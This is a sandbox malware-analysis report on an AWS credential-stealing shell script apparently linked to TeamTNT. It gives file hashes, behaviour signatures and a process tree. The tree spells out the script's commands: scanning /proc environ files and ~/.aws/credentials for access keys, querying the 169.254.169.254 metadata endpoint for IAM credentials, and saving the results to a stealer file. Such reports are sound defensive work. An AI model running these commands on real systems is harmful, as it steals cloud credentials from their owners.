Analysis

  • max time kernel
    148s
  • max time network
    178s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    29-12-2024 23:10

General

  • Target

    SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh

  • Size

    8KB

  • MD5

    572c47986c61bf2fcd7f134299fcd5b2

  • SHA1

    48193cee044078ba308b958cc50a42564c581159

  • SHA256

    af2cf9af17f6db338ba3079b312f182593bad19fab9075a77698f162ce127758

  • SHA512

    97685e6b0fe760342de129905bf05e5a5b6c21cab657b329d6e99c23667c8370ba846c34cd44d543d78f0c793e7641ab94f6761ce439d2c4962e128444ca074c

  • SSDEEP

    96:A40rlQB3tYSQaRqCB4YwSsX9DsGE/D1ElSeU2148WKC2wHyrEGG0benp2GkOQPX1:B6l+425u1/+GK72wHyrEGG0bIp2GiF

Malware Config

Signatures

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads list of loaded kernel modules 1 TTPs 1 IoCs

    Reads the list of currently loaded kernel modules, possibly to detect virtual environments.

  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
    "/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh"
    1⤵
    • Reads list of loaded kernel modules
    • Checks CPU configuration
    • Reads runtime system information
    PID:728
    • /usr/bin/sort
      sort -u
      2⤵
        PID:731
      • /bin/grep
        grep "AWS_DEFAULT_REGION\\|AWS_ACCESS_KEY_ID\\|AWS_SECRET_ACCESS_KEY\\|AWS_SESSION_TOKEN"
        2⤵
          PID:732
        • /usr/bin/strings
          strings /proc/1/environ /proc/10/environ /proc/104/environ /proc/106/environ /proc/107/environ /proc/11/environ /proc/12/environ /proc/13/environ /proc/133/environ /proc/136/environ /proc/14/environ /proc/143/environ /proc/145/environ /proc/15/environ /proc/16/environ /proc/164/environ /proc/17/environ /proc/18/environ /proc/19/environ /proc/2/environ /proc/20/environ /proc/21/environ /proc/212/environ /proc/22/environ /proc/23/environ /proc/24/environ /proc/25/environ /proc/26/environ /proc/27/environ /proc/270/environ /proc/271/environ /proc/273/environ /proc/274/environ /proc/276/environ /proc/28/environ /proc/281/environ /proc/29/environ /proc/3/environ /proc/306/environ /proc/307/environ /proc/316/environ /proc/334/environ /proc/4/environ /proc/41/environ /proc/42/environ /proc/43/environ /proc/5/environ /proc/588/environ /proc/597/environ /proc/599/environ /proc/6/environ /proc/603/environ /proc/612/environ /proc/648/environ /proc/7/environ /proc/707/environ /proc/711/environ /proc/719/environ /proc/723/environ /proc/725/environ /proc/726/environ /proc/727/environ /proc/728/environ /proc/729/environ /proc/730/environ /proc/731/environ /proc/732/environ /proc/75/environ /proc/8/environ /proc/9/environ /proc/97/environ /proc/self/environ /proc/thread-self/environ
          2⤵
          • Reads runtime system information
          PID:730
        • /bin/grep
          grep "aws_access_key_id\\|aws_secret_access_key\\|aws_session_token"
          2⤵
            PID:738
          • /bin/cat
            cat /root/.aws/credentials
            2⤵
              PID:737
            • /bin/grep
              grep "aws_access_key_id\\|aws_secret_access_key\\|aws_session_token"
              2⤵
                PID:741
              • /bin/cat
                cat "/home/*/.aws/credentials"
                2⤵
                  PID:740
                • /bin/grep
                  grep AccessKeyId
                  2⤵
                    PID:744
                  • /bin/sed
                    sed "s/ \"AccessKeyId\" : \"/aws_access_key_id = /g"
                    2⤵
                      PID:745
                    • /bin/sed
                      sed "s/\",//g"
                      2⤵
                        PID:746
                      • /usr/bin/curl
                        curl -sLk http://169.254.169.254/latest/meta-data/iam/security-credentials/
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        PID:748
                      • /usr/bin/curl
                        curl --max-time 13 --connect-timeout 13 -sLk http://169.254.169.254/latest/meta-data/iam/security-credentials/
                        2⤵
                        • Checks CPU configuration
                        PID:743
                      • /usr/bin/sort
                        sort -u
                        2⤵
                          PID:814
                        • /bin/grep
                          grep AWS
                          2⤵
                            PID:815
                          • /usr/bin/strings
                            strings /proc/1/environ /proc/10/environ /proc/104/environ /proc/106/environ /proc/107/environ /proc/11/environ /proc/12/environ /proc/13/environ /proc/133/environ /proc/136/environ /proc/14/environ /proc/143/environ /proc/145/environ /proc/15/environ /proc/16/environ /proc/164/environ /proc/17/environ /proc/18/environ /proc/19/environ /proc/2/environ /proc/20/environ /proc/21/environ /proc/212/environ /proc/22/environ /proc/23/environ /proc/24/environ /proc/25/environ /proc/26/environ /proc/27/environ /proc/270/environ /proc/271/environ /proc/273/environ /proc/274/environ /proc/276/environ /proc/28/environ /proc/281/environ /proc/29/environ /proc/3/environ /proc/306/environ /proc/307/environ /proc/316/environ /proc/334/environ /proc/4/environ /proc/41/environ /proc/42/environ /proc/43/environ /proc/5/environ /proc/588/environ /proc/597/environ /proc/599/environ /proc/6/environ /proc/603/environ /proc/612/environ /proc/7/environ /proc/725/environ /proc/726/environ /proc/727/environ /proc/728/environ /proc/733/environ /proc/75/environ /proc/8/environ /proc/802/environ /proc/810/environ /proc/812/environ /proc/813/environ /proc/814/environ /proc/815/environ /proc/9/environ /proc/97/environ /proc/self/environ /proc/thread-self/environ
                            2⤵
                            • Reads runtime system information
                            PID:813
                          • /bin/rm
                            rm -f /var/tmp/TNT_AWS.txt
                            2⤵
                              PID:816
                            • /usr/bin/curl
                              curl -sLk ipv4.icanhazip.com
                              2⤵
                              • Checks CPU configuration
                              • System Network Configuration Discovery
                              PID:817

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /var/tmp/TNT_AWS.txt

                            Filesize

                            3B

                            MD5

                            2228e977ebea8966e27929f43e39cb67

                            SHA1

                            7c338ed2840d2bf55f9f5e4eed04f66c80840eb3

                            SHA256

                            6a3cf5192354f71615ac51034b3e97c20eda99643fcaf5bbe6d41ad59bd12167

                            SHA512

                            ff9f010b5bdd7591d052fdb8cfc6e7b842f8f973ab37a91ea5e16449c17e9278d9f95f265b0508f083348376aeb16d7f02b7b86cde634e8c9f875287049360de

                          • /var/tmp/TNT_AWS.txt

                            Filesize

                            6B

                            MD5

                            6d93d3216dc4a7f5df47d4876fbec4d3

                            SHA1

                            7a0c7e3dd8173007d955db528117071f441c8541

                            SHA256

                            d088784b7ecb87f1ea17e6f982fa968ffefcc07b79de6ecc548fc00242868da6

                            SHA512

                            36922722671d2bb1d014b55dccb9431196c0f6e00465a28cea54c25027d08b968e7fdde74df9c287d0c9a7d0ebd195acc572d74d0ac7de0fab6e087b9111029c

                          • /var/tmp/TNT_AWS.txt

                            Filesize

                            9B

                            MD5

                            33f4f15a16a9843faf6a25d4f387b6fd

                            SHA1

                            c0d63dddfbc3523608304cc80ef04e521acb685e

                            SHA256

                            1e135afb54bf948ed616b7e518ea9f59c8edad95a2d1dfbae8adc60b167c5f6c

                            SHA512

                            faa912fb483361fe90e230c2137c8d6fab26c3accb3199b20140810c533bbbb064fa29da385d57494fb7ff95a4f9dbe4969e552c1f08e95a1e3f9bd87478ab54

                          • /var/tmp/TeamTNT_AWS_STEALER.txt

                            Filesize

                            25B

                            MD5

                            706262cd6acf8e426902e2131aa76725

                            SHA1

                            cb2906e5236dd2720c8517a27c43c19dc79c6a99

                            SHA256

                            6b8af17b4b6b1f99fc19b44bd1fe1715290471451dfb701cf5e2fd594d589d9c

                            SHA512

                            26edd4bed70d4475d76b59b4572da8fae201fc3e7d54e4a1753aa1e6ab15e22885bc5324cba7ed97a8f5e97bbb3bbc72575ae722381f0e0490475451e6f5fd6c

                          • /var/tmp/TeamTNT_AWS_STEALER.txt

                            Filesize

                            50B

                            MD5

                            53c4eed3aa0f16c1f34e566e841bb026

                            SHA1

                            27fc76586e80661003cdacdea563ced0cf19710f

                            SHA256

                            8c32cba969af187b2ab6de8b8c1afcf33f7d36740df6303195c8ae8f807bc147

                            SHA512

                            92ecac49852749281bca7803982a0d3b33aebdc16e00662cd5564c10a2f11d8251ca3c3fcf5f2ab33264934489c9cd26734f81e01dd93ed442e4e59b4a5bfe40

                          • /var/tmp/TeamTNT_AWS_STEALER.txt

                            Filesize

                            70B

                            MD5

                            511befb58daff8bd27aa2507a5048f0e

                            SHA1

                            37f4d265a5e9ea6ec6b5d562ea5e46d93e6a6d69

                            SHA256

                            5e67c2c5fd5f59c6a56343a80d23fc7ad405d94c2f535a7ed52726e11046141f

                            SHA512

                            c83f540583c191552ead7dae449d325166af0448e4a689ae87e57a929a35b5deab6869981ec8afe501266c610340a4bc020e7e9bab995afff9a8aabc982c1a85

                          • /var/tmp/TeamTNT_AWS_STEALER.txt

                            Filesize

                            73B

                            MD5

                            52348a3bc7381a8237238b44aa62593d

                            SHA1

                            92dd9b117dea1e0d1548325143e0a3f408940379

                            SHA256

                            67dde48321dbc5d16cddff92ae39b607f7bbafd8ee6d6672ab5a83fd3f76f1e1

                            SHA512

                            2e967b0d58ea959343902e1e6041625489796bc5f72758ab660d73e7d9b098f193051c9671c5035ad77cc196a7d13826aac4299bdf5012acc6de7ec136466564